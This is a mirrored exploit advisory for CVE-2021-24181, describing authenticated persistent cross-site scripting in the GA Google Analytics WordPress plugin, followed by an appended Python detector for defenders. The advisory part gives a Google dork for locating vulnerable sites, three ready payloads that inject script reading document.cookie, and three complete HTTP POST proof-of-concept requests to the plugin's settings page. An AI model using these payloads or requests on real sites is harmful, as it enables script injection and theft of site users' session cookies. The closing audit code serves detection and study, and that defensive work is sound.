GA Google Analytics WordPress Plugin <= 20210211 - Multiple Authenticated Persistent XSS

CVE: CVE-2021-24181
Category: CWE-79
Price: $5,000
Severity: High
Author: Cybersecurity Researcher
Risk: High
Exploitation Type: Remote
Date: 2021-05-17
CPE: cpe:/a:google_analytics:google_analytics_wordpress_plugin
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021050090

Below is a copy:

GA Google Analytics WordPress Plugin <= 20210211 - Multiple Authenticated Persistent XSS
/*!
- # VULNERABILITY: GA Google Analytics WordPress Plugin <= 20210211 - Authenticated Persistent XSS
- # GOOGLE DORK: inurl:/wp-content/plugins/ga-google-analytics/
- # DATE: 2021-04-04
- # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ]
- # VENDOR: Jeff Starr [ https://plugin-planet.com ]
- # SOFTWARE VERSION: <= 20210211
- # SOFTWARE LINK: https://wordpress.org/plugins/ga-google-analytics/
- # CVSS: AV:N/AC:L/PR:H/UI:N/S:C
- # CWE: CWE-79
- # CVE: N/A
*/



### -- [ Info: ]

[i] An Authenticated Persistent XSS vulnerability was discovered in the GA Google Analytics plugin through v20210211 for WordPress.

[i] Vulnerable parameter(s): &gap_options[gap_id]=, &gap_options[tracker_object]=, &gap_options[gap_custom_code]=.



### -- [ Impact: ]

[~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.



### -- [ Payloads: ]

[$] GA Tracking ID: 13"' ' m0ze=m0ze= onload=alert(document.cookie); //

[$] Custom Tracker Objects: '');alert(document.cookie);alert('m0ze'

[$] Custom Tracker Objects (Part #1): '\');alert(document.cookie);/* | Custom GA Code (Part #2): */;



### -- [ PoC #1 | Authenticated Persistent XSS | GA Tracking ID: ]

[!] POST /wp-admin/options.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 459
Cookie: [admin cookies]

option_page=gap_plugin_options&action=update&_wpnonce=a85709d61b&gap_options%5Bgap_id%5D=13%22%27+%27+m0ze%3Dm0ze%3D+onload%3Dalert%28document.cookie%29%3B+%2F%2F&gap_options%5Bgap_enable%5D=2&gap_options%5Bgap_location%5D=header&gap_options%5Btracker_object%5D=&gap_options%5Bgap_custom_code%5D=&gap_options%5Bgap_custom%5D=



### -- [ PoC #2 | Authenticated Persistent XSS | Custom Tracker Objects: ]

[!] POST /wp-admin/options.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 449
Cookie: [admin cookie]

option_page=gap_plugin_options&action=update&_wpnonce=a85709d61b&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dga-google-analytics%26settings-updated%3Dtrue&gap_options%5Bgap_id%5D=m0ze&gap_options%5Bgap_enable%5D=1&gap_options%5Bgap_location%5D=header&gap_options%5Btracker_object%5D=%27%27%29%3Balert%28document.cookie%29%3Balert%28%27m0ze%27&gap_options%5Bgap_custom_code%5D=&gap_options%5Bgap_custom%5D=



### -- [ PoC #3 | Authenticated Persistent XSS | Custom Tracker Objects & Custom GA Code: ]

[!] POST /wp-admin/options.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 445
Cookie: [admin cookie]

option_page=gap_plugin_options&action=update&_wpnonce=a85709d61b&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dga-google-analytics%26settings-updated%3Dtrue&gap_options%5Bgap_id%5D=m0ze&gap_options%5Bgap_enable%5D=1&gap_options%5Bgap_location%5D=header&gap_options%5Btracker_object%5D=%27%5C%27%29%3Balert%28document.cookie%29%3B%2F*&gap_options%5Bgap_custom_code%5D=*%2F%3B&gap_options%5Bgap_custom%5D=



### -- [ Contacts: ]

[+] Website: m0ze.ru
[+] GitHub: @m0ze
[+] Telegram: @m0ze_ru
[+] Twitter: @vladm0ze
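
For defenders reviewing WAF or proxy captures of settings updates, the following added example (not part of the advisory or the plugin's code) audits the three parameters named under Info in a form-urlencoded POST body to /wp-admin/options.php. The accepted tracking-ID shapes, the break-out heuristics and the sample bodies are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlencode

# Assumption: only Universal Analytics (UA-...) and GA4 (G-...) IDs are accepted.
GA_ID = re.compile(r"(UA-\d{4,10}-\d{1,4}|G-[A-Z0-9]{4,20})")
# Heuristic (assumption): a closed call, a backslash or markup characters
# have no place in a tracker-object argument.
BREAKOUT = re.compile(r"\)\s*;|\\|[<>]")


def unbalanced_comment(value: str) -> bool:
    """True when /* and */ do not pair up, as in a value split over two fields."""
    return value.count("/*") != value.count("*/")


def audit_settings_post(body: str) -> dict:
    """Map each suspicious gap_options field in a form-urlencoded
    /wp-admin/options.php body to the reason it was flagged."""
    form = parse_qs(body, keep_blank_values=True)
    if form.get("option_page") != ["gap_plugin_options"]:
        return {}  # not a settings update for this plugin
    opt = {k: form.get(f"gap_options[{k}]", [""])[0]
           for k in ("gap_id", "tracker_object", "gap_custom_code")}
    findings = {}
    if opt["gap_id"] and not GA_ID.fullmatch(opt["gap_id"]):
        findings["gap_id"] = "not a tracking ID"
    tracker = opt["tracker_object"]
    if BREAKOUT.search(tracker) or unbalanced_comment(tracker):
        findings["tracker_object"] = "breaks out of argument"
    if unbalanced_comment(opt["gap_custom_code"]):
        findings["gap_custom_code"] = "unpaired comment marker"
    return findings


def make_body(**options) -> str:
    """Build a constructed sample body; not a captured request."""
    fields = {"option_page": "gap_plugin_options", "action": "update"}
    fields.update({f"gap_options[{k}]": v for k, v in options.items()})
    return urlencode(fields)


# Constructed samples: one benign update and two suspicious ones.
BENIGN = make_body(gap_id="UA-123456-1", tracker_object="{'cookieDomain':'none'}",
                   gap_custom_code="ga('set', 'anonymizeIp', true);")
SPLIT = make_body(gap_id="UA-123456-1", tracker_object="'x');f();/*",
                  gap_custom_code="*/;")
BAD_ID = make_body(gap_id="13\"' onload=f() //")

if __name__ == "__main__":
    for name, body in (("benign", BENIGN), ("split", SPLIT), ("bad id", BAD_ID)):
        print(name, audit_settings_post(body))
```

A hit is a prompt to inspect the stored option and who saved it, not proof of compromise; the comment check only compares marker counts, so treat it as a coarse filter.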
